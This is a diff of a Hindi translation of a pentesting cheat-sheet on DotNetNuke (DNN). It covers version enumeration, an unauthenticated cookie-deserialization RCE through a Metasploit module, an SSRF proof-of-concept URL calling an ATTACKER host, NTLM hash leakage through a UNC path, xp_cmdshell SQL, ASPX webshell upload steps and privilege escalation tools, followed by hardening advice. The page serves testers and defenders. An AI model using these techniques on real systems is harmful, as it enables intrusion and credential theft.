Translated ['src/network-services-pentesting/pentesting-web/dotnetnuke-d

src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md

@@ -4,37 +4,92 @@
 
 ## DotNetNuke (DNN)
 
-यदि आप DNN में **administrator** के रूप में प्रवेश करते हैं तो RCE प्राप्त करना आसान है।
+यदि आप DNN में **administrator** के रूप में प्रवेश करते हैं तो **RCE** प्राप्त करना आसान है, हालांकि पिछले कुछ वर्षों में कई *unauthenticated* और *post-auth* तकनीकों को प्रकाशित किया गया है। निम्नलिखित चीट-शीट आक्रामक और रक्षात्मक कार्य के लिए सबसे उपयोगी प्राइमिटिव्स को एकत्र करती है।
 
-## RCE
+---
+## संस्करण और वातावरण गणना
 
-### SQL के माध्यम से
+* *X-DNN* HTTP प्रतिक्रिया हेडर की जांच करें - यह आमतौर पर सटीक प्लेटफ़ॉर्म संस्करण का खुलासा करता है।
+* स्थापना विज़ार्ड `/Install/Install.aspx?mode=install` में संस्करण लीक करता है (बहुत पुराने इंस्टॉलेशन पर पहुंच योग्य)।
+* `/API/PersonaBar/GetStatus` (9.x) निम्न-privilege उपयोगकर्ताओं के लिए `"dnnVersion"` वाला JSON ब्लॉब लौटाता है।
+* लाइव इंस्टेंस पर आप जो सामान्य कुकीज़ देखेंगे:
+* `.DOTNETNUKE` – ASP.NET फॉर्म्स प्रमाणीकरण टिकट।
+* `DNNPersonalization` – XML/serialized उपयोगकर्ता प्रोफ़ाइल डेटा (पुराने संस्करण - नीचे RCE देखें)।
 
-एक SQL कंसोल **`Settings`** पृष्ठ के तहत उपलब्ध है जहाँ आप **`xp_cmdshell`** सक्षम कर सकते हैं और **ऑपरेटिंग सिस्टम कमांड** चला सकते हैं।
+---
+## अनधिकृत शोषण
 
-**`xp_cmdshell`** सक्षम करने के लिए इन पंक्तियों का उपयोग करें:
-```sql
-EXEC sp_configure 'show advanced options', '1'
-RECONFIGURE
-EXEC sp_configure 'xp_cmdshell', '1'
-RECONFIGURE
+### 1. कुकी डेसिरियलाइजेशन RCE  (CVE-2017-9822 & फॉलो-अप)
+*प्रभावित संस्करण ≤ 9.3.0-RC*
+
+`DNNPersonalization` हर अनुरोध पर डेसिरियलाइज किया जाता है जब अंतर्निहित 404 हैंडलर सक्षम होता है। इस प्रकार तैयार XML मनमाने गैजेट श्रृंखलाओं और कोड निष्पादन की ओर ले जा सकता है।
 ```
-और **"Run Script"** पर क्लिक करें ताकि उस sQL वाक्य को चलाया जा सके।
-
-फिर, OS कमांड चलाने के लिए निम्नलिखित में से कुछ का उपयोग करें:
-```sql
-xp_cmdshell 'whoami'
+msf> use exploit/windows/http/dnn_cookie_deserialization_rce
+msf> set RHOSTS <target>
+msf> set LHOST  <attacker_ip>
+msf> run
 ```
-### ASP वेबशेल के माध्यम से
+मॉड्यूल स्वचालित रूप से पैच किए गए लेकिन अभी भी कमजोर संस्करणों (CVE-2018-15811/15812/18325/18326) के लिए सही पथ चुनता है। शोषण **बिना प्रमाणीकरण** के 7.x–9.1.x पर और 9.2.x+ पर *सत्यापित* निम्न-privilege खाते के साथ काम करता है।
 
-`Settings -> Security -> More -> More Security Settings` में आप **नए अनुमत एक्सटेंशन** को `Allowable File Extensions` के तहत **जोड़ सकते हैं**, और फिर `Save` बटन पर क्लिक कर सकते हैं।
+### 2. सर्वर-साइड अनुरोध धोखाधड़ी (CVE-2025-32372)
+*प्रभावित संस्करण < 9.13.8  –  पैच अप्रैल 2025 में जारी किया गया*
 
-**`asp`** या **`aspx`** जोड़ें और फिर **`/admin/file-management`** में एक **asp वेबशेल** अपलोड करें जिसे `shell.asp` कहा जाता है, उदाहरण के लिए।
+पुराने `DnnImageHandler` फिक्स का बायपास एक हमलावर को सर्वर को **मनमाने GET अनुरोध** जारी करने के लिए मजबूर करने की अनुमति देता है (सेमी-ब्लाइंड SSRF)। व्यावहारिक प्रभाव:
 
-फिर **`/Portals/0/shell.asp`** पर पहुँचें ताकि आप अपने वेबशेल तक पहुँच सकें।
+* आंतरिक पोर्ट स्कैन / क्लाउड तैनाती में मेटाडेटा सेवा खोज।
+* उन होस्टों तक पहुंचें जो अन्यथा इंटरनेट से फ़ायरवॉल किए गए हैं।
 
-### विशेषाधिकार वृद्धि
+प्रूफ-ऑफ-कॉन्सेप्ट (`TARGET` और `ATTACKER` को बदलें):
+```
+https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
+```
+The request is triggered in the background; monitor your listener for callbacks.
 
-आप **विशेषाधिकार बढ़ा सकते हैं** उदाहरण के लिए **Potatoes** या **PrintSpoofer** का उपयोग करके।
+### 3. NTLM Hash Exposure via UNC Redirect  (CVE-2025-52488)
+*Affected versions 6.0.0 – 9.x (< 10.0.1)*
 
+विशेष रूप से तैयार की गई सामग्री DNN को **UNC path** का उपयोग करके संसाधन लाने का प्रयास करने के लिए मजबूर कर सकती है जैसे `\\attacker\share\img.png`। Windows खुशी-खुशी NTLM बातचीत करेगा, सर्वर-खाता हैश को हमलावर को लीक करेगा। **10.0.1** में अपग्रेड करें या फ़ायरवॉल पर आउटबाउंड SMB को बंद करें।
+
+### 4. IP Filter Bypass  (CVE-2025-52487)
+यदि प्रशासक *Host/IP Filters* पर निर्भर करते हैं प्रशासन पोर्टल सुरक्षा के लिए, तो ध्यान रखें कि **10.0.1** से पहले के संस्करणों को एक रिवर्स-प्रॉक्सी परिदृश्य में `X-Forwarded-For` को हेरफेर करके बायपास किया जा सकता है।
+
+---
+## Post-Authentication to RCE
+
+### Via SQL console
+**`Settings → SQL`** के तहत एक अंतर्निहित क्वेरी विंडो साइट डेटाबेस के खिलाफ निष्पादन की अनुमति देती है। Microsoft SQL Server पर आप **`xp_cmdshell`** को सक्षम कर सकते हैं और कमांड उत्पन्न कर सकते हैं:
+```sql
+EXEC sp_configure 'show advanced options', 1;
+RECONFIGURE;
+EXEC sp_configure 'xp_cmdshell', 1;
+RECONFIGURE;
+GO
+xp_cmdshell 'whoami';
+```
+### Via ASPX वेबशेल अपलोड
+1. **`Settings → Security → More → More Security Settings`** पर जाएं।
+2. **Allowable File Extensions** में `aspx` (या `asp`) जोड़ें और **Save** करें।
+3. **`/admin/file-management`** पर जाएं और `shell.aspx` अपलोड करें।
+4. इसे **`/Portals/0/shell.aspx`** पर ट्रिगर करें।
+
+---
+## Windows पर विशेषाधिकार वृद्धि
+एक बार जब कोड निष्पादन **IIS AppPool\<Site>** के रूप में प्राप्त हो जाता है, तो सामान्य Windows विशेषाधिकार वृद्धि तकनीकें लागू होती हैं। यदि बॉक्स कमजोर है, तो आप इसका लाभ उठा सकते हैं:
+
+* **PrintSpoofer** / **SpoolFool** का उपयोग *SeImpersonatePrivilege* का दुरुपयोग करने के लिए।
+* *Service Accounts* से बचने के लिए **Juicy/Sharp Potatoes**।
+
+---
+## हार्डनिंग सिफारिशें (ब्लू टीम)
+
+* कम से कम **9.13.9** (SSRF बायपास को ठीक करता है) या बेहतर **10.0.1** (IP फ़िल्टर और NTLM मुद्दे) में **Upgrade** करें।
+* स्थापना के बाद अवशिष्ट **`InstallWizard.aspx*`** फ़ाइलें हटा दें।
+* आउटबाउंड SMB (पोर्ट 445/139) ईग्रेस को अक्षम करें।
+* DNN के भीतर के बजाय एज प्रॉक्सी पर मजबूत *Host Filters* लागू करें।
+* यदि अनुपयोगी हो तो `/API/RemoteContentProxy` तक पहुंच को ब्लॉक करें।
+
+## संदर्भ
+
+* Metasploit `dnn_cookie_deserialization_rce` मॉड्यूल दस्तावेज़ – व्यावहारिक अनधिकृत RCE विवरण (GitHub)।
+* GitHub सुरक्षा सलाह GHSA-3f7v-qx94-666m – 2025 SSRF बायपास और पैच जानकारी।
 {{#include ../../banners/hacktricks-training.md}}